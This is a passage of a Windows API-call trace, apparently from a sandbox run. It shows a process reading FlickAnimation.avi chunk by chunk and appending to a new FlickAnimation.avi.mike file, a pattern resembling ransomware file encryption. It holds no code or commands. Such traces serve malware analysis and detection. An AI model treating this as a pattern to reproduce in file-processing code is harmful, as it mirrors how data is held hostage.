GetFileType (hFile=0x264) returned 0x1 [0043.019] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.019] GetFileType (hFile=0x264) returned 0x1 [0043.019] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x1e220 [0043.019] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.020] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.020] GetFileType (hFile=0x264) returned 0x1 [0043.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.020] GetFileType (hFile=0x264) returned 0x1 [0043.020] SetFilePointer (in: hFile=0x264, lDistanceToMove=133120, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x20800 [0043.020] ReadFile (in: hFile=0x264, lpBuffer=0x219e344, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x219e344*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.021] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.021] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.021] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.021] GetFileType (hFile=0x264) returned 0x1 [0043.021] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.021] GetFileType (hFile=0x264) returned 0x1 [0043.021] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x20a20 [0043.022] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.022] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.022] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.022] GetFileType (hFile=0x264) returned 0x1 [0043.022] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.022] GetFileType (hFile=0x264) returned 0x1 [0043.022] SetFilePointer (in: hFile=0x264, lDistanceToMove=143360, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x23000 [0043.022] ReadFile (in: hFile=0x264, lpBuffer=0x21ab31c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21ab31c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.023] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.023] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.024] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.024] GetFileType (hFile=0x264) returned 0x1 [0043.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.024] GetFileType (hFile=0x264) returned 0x1 [0043.024] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x23220 [0043.024] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.024] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.024] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.024] GetFileType (hFile=0x264) returned 0x1 [0043.024] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.024] GetFileType (hFile=0x264) returned 0x1 [0043.024] SetFilePointer (in: hFile=0x264, lDistanceToMove=153600, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x25800 [0043.025] ReadFile (in: hFile=0x264, lpBuffer=0x21b82f4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21b82f4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.026] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.026] GetFileType (hFile=0x264) returned 0x1 [0043.026] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.026] GetFileType (hFile=0x264) returned 0x1 [0043.026] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x25a20 [0043.026] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.026] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.026] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.027] GetFileType (hFile=0x264) returned 0x1 [0043.027] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.027] GetFileType (hFile=0x264) returned 0x1 [0043.027] SetFilePointer (in: hFile=0x264, lDistanceToMove=163840, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x28000 [0043.027] ReadFile (in: hFile=0x264, lpBuffer=0x21c52cc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21c52cc*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.028] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.028] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.028] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.028] GetFileType (hFile=0x264) returned 0x1 [0043.028] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.028] GetFileType (hFile=0x264) returned 0x1 [0043.028] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x28220 [0043.029] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.029] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.029] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.029] GetFileType (hFile=0x264) returned 0x1 [0043.029] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.029] GetFileType (hFile=0x264) returned 0x1 [0043.029] SetFilePointer (in: hFile=0x264, lDistanceToMove=174080, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2a800 [0043.029] ReadFile (in: hFile=0x264, lpBuffer=0x21d22a4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21d22a4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.030] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.030] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.030] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.030] GetFileType (hFile=0x264) returned 0x1 [0043.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.031] GetFileType (hFile=0x264) returned 0x1 [0043.031] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2aa20 [0043.031] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.031] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.031] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.031] GetFileType (hFile=0x264) returned 0x1 [0043.031] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.031] GetFileType (hFile=0x264) returned 0x1 [0043.031] SetFilePointer (in: hFile=0x264, lDistanceToMove=184320, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2d000 [0043.031] ReadFile (in: hFile=0x264, lpBuffer=0x21df27c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21df27c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.033] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.033] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.033] GetFileType (hFile=0x264) returned 0x1 [0043.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.033] GetFileType (hFile=0x264) returned 0x1 [0043.033] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2d220 [0043.033] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.033] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.033] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.033] GetFileType (hFile=0x264) returned 0x1 [0043.033] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.033] GetFileType (hFile=0x264) returned 0x1 [0043.034] SetFilePointer (in: hFile=0x264, lDistanceToMove=194560, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x2f800 [0043.034] ReadFile (in: hFile=0x264, lpBuffer=0x21ec254, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21ec254*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.035] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.035] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.035] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.035] GetFileType (hFile=0x264) returned 0x1 [0043.035] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.035] GetFileType (hFile=0x264) returned 0x1 [0043.035] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x2fa20 [0043.035] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.036] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.036] GetFileType (hFile=0x264) returned 0x1 [0043.036] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.036] GetFileType (hFile=0x264) returned 0x1 [0043.036] SetFilePointer (in: hFile=0x264, lDistanceToMove=204800, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x32000 [0043.036] ReadFile (in: hFile=0x264, lpBuffer=0x21f922c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21f922c*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.060] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.061] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.061] GetFileType (hFile=0x264) returned 0x1 [0043.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.061] GetFileType (hFile=0x264) returned 0x1 [0043.061] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x32220 [0043.061] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.061] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.061] GetFileType (hFile=0x264) returned 0x1 [0043.061] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.061] GetFileType (hFile=0x264) returned 0x1 [0043.062] SetFilePointer (in: hFile=0x264, lDistanceToMove=215040, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x34800 [0043.062] ReadFile (in: hFile=0x264, lpBuffer=0x2206204, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2206204*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.064] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.064] GetFileType (hFile=0x264) returned 0x1 [0043.064] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.064] GetFileType (hFile=0x264) returned 0x1 [0043.064] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x34a20 [0043.064] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.064] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.064] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.065] GetFileType (hFile=0x264) returned 0x1 [0043.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.065] GetFileType (hFile=0x264) returned 0x1 [0043.065] SetFilePointer (in: hFile=0x264, lDistanceToMove=225280, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x37000 [0043.065] ReadFile (in: hFile=0x264, lpBuffer=0x22131dc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22131dc*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.066] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike", lpFilePart=0x0) returned 0x4a [0043.066] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.066] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.066] GetFileType (hFile=0x264) returned 0x1 [0043.066] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.066] GetFileType (hFile=0x264) returned 0x1 [0043.066] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x37220 [0043.067] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi", lpFilePart=0x0) returned 0x45 [0043.067] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.067] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\FlickAnimation.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\flickanimation.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.067] GetFileType (hFile=0x264) returned 0x1 [0043.067] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.067] GetFileType (hFile=0x264) returned 0x1 [0043.067] SetFilePointer (in: hFile=0x264, lDistanceToMove=235520, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x39800 [0043.067] ReadFile (in: hFile=0x264, lpBuffer=0x22201b4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x22201b4*, lpNumberOfBytesRead=0x2af0c8*=0x2800, lpOverlapped=0x0) returned 1 [0043.068] GetFullPathNameW (in: lpFileName="C:\\Program 